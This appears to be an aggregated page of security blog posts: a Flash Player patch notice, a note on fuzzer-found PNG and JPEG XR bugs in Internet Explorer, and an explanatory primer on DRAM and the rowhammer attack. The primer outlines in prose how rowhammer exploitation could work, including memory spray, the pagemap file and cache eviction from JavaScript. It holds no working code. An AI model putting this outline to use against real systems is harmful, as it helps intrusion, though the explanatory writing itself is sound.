brokenflash-aNot sure whether your browser has Flash installed or what version it may be running? Browse to this link. The newest, patched version is 17.0.0.134 for Windows and Mac users. Adobe Flash Player installed with Google Chrome, as well as Internet Explorer on Windows 8.x, should automatically update to version 17.0.0.134.

The most recent versions of Flash should be available from the Flash home page, but beware potentially unwanted add-ons, like McAfee Security Scan. To avoid this, uncheck the pre-checked box before downloading, or grab your OS-specific Flash download from here. Windows users who browse the Web with anything other than Internet Explorer may need to apply this patch twice, once with IE and again using the alternative browser (Firefox, Opera, e.g.).

The last few Flash updates from Adobe have been in response to zero-day threats targeting previously unknown vulnerabilities in the program. But Adobe says it is not aware of any exploits in the wild for the issues addressed in this update. Adobe’s advisory on this patch is available here.

lcamtuf's blog: Another round of image bugs: PNG and JPEG XR

This post was syndicated from: lcamtuf's blog and was written by: Michal Zalewski. Original post: at lcamtuf's blog

Today’s release of MS15-024 and
MS15-029 addresses two more image-related memory disclosure vulnerabilities in Internet Explorer – this time, affecting the little-known JPEG XR format supported by this browser, plus the far more familiar PNG. Similarly to the previously discussed bugs in MSIE TIFF and JPEG parsing, and to the BMP, ICO, and GIF and JPEG DHT & SOS flaws in Firefox and Chrome, these two were found with afl-fuzz. The earlier posts have more context – today, just enjoy some pretty pics, showing subsequent renderings of the same JPEG XR image:

Proof-of-concepts are here (JXR) and here (PNG). I am happy to report that Microsoft fixed them within roughly three months of the original report.

The total number of bugs squashed in this category is now ten. I have just one more multi-browser image parsing bug outstanding – but it should be an interesting one. Stay tuned.

Errata Security: Some notes on DRAM (#rowhammer)

This post was syndicated from: Errata Security and was written by: Robert Graham. Original post: at Errata Security

My twitter feed is full of comments about the “rowhammer” exploit. I thought I’d write some quick notes about DRAM. The TL;DR version is this: you probably don’t need to worry about this, but we (the designers of security and of computer hardware/software) do.

There are several technologies for computer memory. The densest, and hence cheapest-per-bit, is “DRAM”. It consists of a small capacitor for each bit of memory. The thing about capacitors is that they lose their charge over time and must be refreshed. In the case of DRAM, every bit of memory must be read them re-written every 64-milliseconds or it becomes corrupt.
These tiny capacitors are prone to corruption from other sources. One common source of corruption is cosmic rays. Another source is small amounts of radioactive elements in the materials used to construct memory chips. So, chips must be built with radioactive-free materials. The banana you eat has more radioactive material inside it than your DRAM chips.

The upshot is that capacitors are unreliable (albeit extremely cheap) technology for memory which readily get corrupted for a lot of reasons. This “rowhammer” exploit works by corrupting the capacitors by overwriting adjacent rows hundreds of thousands of times, hoping that some bits randomly flip. Like cosmic rays or radioactive hits, this only changes the temporary value within the cell, but has no permanent effect.
Because of this unreliability in capacitors, servers use ECC or error-correcting memory. This adds extra memory chips, so that 72 bits are read for every 64 bits of desired memory. If any single bit is flipped, the additional eight bits can be used to correct it.
The upshot of ECC memory is that it should also detect and correct rowhammer bit-flips just as well as cosmic-ray bit-flips. The problem is that ECC memory costs more. The memory itself is about 30% more expensive (although it contains only 12% more chips). An 8-gigabyte DIMM non-ECC costs $60 right now, whereas an ECC equivalent costs $80. The CPUs and motherboards that use ECC memory are also slightly more expensive. Update:  see below.
Note that the hacker doesn’t have complete control over which bits will be flipped. They are highly likely to flip the wrong bits and crash the system rather than gain exploitation. However, hackers have lots of ways of mitigating this. For example, as described in the google post, hackers can do a memory spray. They can allocate a large amount of memory, and then set it up so that no matter which bits gets flipped, the resulting value will still point to something valid.
The upshot is that while this problem seems random like cosmic rays, one should realize that hackers can control things better than it would appear. Historically, bugs like stack and heap overflows were once considered too random for hackers to predict, but which were then proven to be solidly predictable. Likewise, address space layout randomization was a technique design to stop hackers, which they then start using memory spray to defeat.
DRAM capacitors are arranged in a rectangular grid or bank. A chip will have multiple banks (usually eight of them). Banks are rectangular rather than square, with more rows than columns. Rows are usually 1024 bits wide, so increasing capacity usually means increasing the number of rows. (The wider the row, the slower the access).
My computer has 16 gigabytes of RAM. It uses two channels, with two DIMMs per channel. Each DIMM is double-sided, which means it has two ranks. Each rank has eight chips acting together to produce 64 bits at a time (or 8 bytes). Each chip in a rank has eight banks. Each bank has 32k rows and 1k columns. Thus, an address might be broken down as follows:
  3 3 3 3 3 2 2 2 2 2 2 2 2 2 2 1 1 1 1 1 1 1 1 1 1 
  4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 |C|D|R|bank | row                           | column            |x x x|
 +-+++++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  | | |
  | | +– rank
  | +—- DIMM
  +—— channel
In practice, though, this precise arrangement would be inefficient. If physical addresses were truly laid out this way, then the second memory channel would only be used for the upper half of physical memory. For better performance, you want to interleave memory access, so that on average, half of all memory accesses are on one channel, and the other half on the other channel. Likewise, for best performance, you want to interleave access among the DIMMs, ranks, and banks, and rows. However, you don’t want to interleave column access: once a row is open on a particular bank, it’s most efficient to read sequentially from that row.
The upshot is that the for optimal performance, the memory controller will rearrange the physical addresses (except for the column portion). Knowledge of how the memory controller does this is needed for robust exploitation of this bug. In today’s systems, the memory controller is built-in to the CPU, so exploitation will be different depending upon which CPU a system has.
In today’s computers, software doesn’t use physical addresses to memory. Instead, they use virtual addresses. This virtual memory means that when a bug causes a program to crash, it doesn’t corrupt the memory of other programs, or the memory of the operating system. This is also a security feature, preventing one user account from meddling with another. (Indeed, rowhammer’s goal is to bypass this security feature). In old computers, this was also used to trick applications into thinking they had more virtual memory than physical memory in the system. Infrequently used blocks of memory would be removed from the physical memory and saved to disk, and would automatically be read back into the system as needed.
Individual addresses aren’t mapped on a one-to-one basis. Instead, the translation is done a page of 4096 addresses at a time. It’s the operating system kernel that manages these page tables to create the mappings, and it’s the CPU hardware that uses the page tables to do the translations automatically.
The upshot of this is that in order to exploit this bug, the hacker needs to know how virtual memory is translated to physical memory. This is easy on Linux, where a pseudo file /proc/PID/pagemap exists that contains this mapping. It may be harder in other systems.
The hypervisor hosting virtual machines (VMs) use yet another layer of page tables. Unlike operating systems, hypervisors don’t expose the physical mapping to the virtual machines. The upshot of this is that people running VMs in the cloud do not have to worry about other customers using this technique to hack them. It’s probably not a concern anyway, since most cloud systems use error correcting memory, but the VM translation makes it extra hard to crack.
Thus, the only real vector of exploitation is where a hostile person can run native code on a system. There are some cheap hosting environments where this is possible, running cheap servers without ECC memory, with separate user accounts instead of using virtual machines. However, such environments tend to be so riddled with holes that there are likely easier routes to exploitation than this one.
The biggest threat at the moment appears to be to desktops/laptops, because they have neither ECC memory nor virtual machines. In particular, there seems to be a danger with Google’s native client (NaCl) code execution. This a clever sandbox that allows the running of native code within the Chrome browser, so that web pages can run software as fast as native software on the system. This memory corruption defeats one level of protection in NaCl. Nobody has yet demonstrated how to use this technique in practice to fully defeat NaCl, but it’s likely somebody will discover a way eventually. In the meanwhile, it’s likely Google will update Chrome to defeat this, such as getting rid of the cache flush operation that forces memory overwrites.
The underlying issue is an analog one. It’s not a bug in the code, or in the digital design of the chips, but a problem at a deeper layer. Rowhammer is not the first to exploit issues like this. For example, I own domains that are one bit different than Google’s as a form of bit-squatting, with traffic arriving on my domain when a bit-flip causes a domain-name to change, such as when “google.com” becomes “foogle.com”. Travis Goodspeed’s packet-in-packet work show the flaw when bits (well, symbols) get flipped in radio waves.

Update: This is really just meant as a primer, as background on the issue, not really trying to derive any conclusions. I chatted a bit Chris Evans (@scarybeasts) from google about some of those conclusion, so I thought I’d expand a bit on them.

Does ECC protect you? Maybe not. While it will correct single bit flips most of the time, it won’t protect when multiple bits flip at once. The hacker may be able to achieve this with enough tries. Remember: the hacker’s code can keep retrying this until it succeeds, even if that takes hours. Since ECC is correcting the memory, nothing will crash. You won’t see anything wrong except high CPU usage — until the hacker eventually gets multiple bit-flips, and either the system crashes or the hacker gets successful exploitation. I forget the exact details. I think Intel CPUs correct single bit errors, crash on two bit errors, and that three bit errors might go through. Also, this would depend upon the percentage of time that the hacker can successfully get two/three bit flips instead of a single one.

By itself, this bug may not endanger you. However, it’s much more dangerous when used within conjunction with other bugs. Browsers have “sand boxes” that keep hackers contained even if the first layer of defense breaks. This may provide a way of escaping the sand box (sandbox escape) when used in conjunction with other exploits.

Cache eviction is pretty predictable and may be exploitable from JavaScript even without access to the cache-flush instruction. Intel has a 32-kilobyte L1 cache for data. This is divided into 64 sets, each holding 8 items in a set, with each item being a 64 byte cache-line (64 times 8 times 64 equals 32k). Using JavaScript, one could easily create an array of bytes just long enough to force accessing 9 items in a set — thus forcing the least-recently-used chunk to be flushed out to memory. Well, it gets tricky, because the L1 cache lines get bumped down to L2 cache, which get bumped down to L3, so code would have to navigate the entire cache hierarchy, which changes per processor. But it’s probably doable, meaning that a JavaScript program may be able to cause havoc with the system.

I misread the paper. It says that Chrome’s NaCl already removed the cache-flush operation a while ago, so Chrome is “safe”. However, I wonder about that whether that cache eviction strategy might work.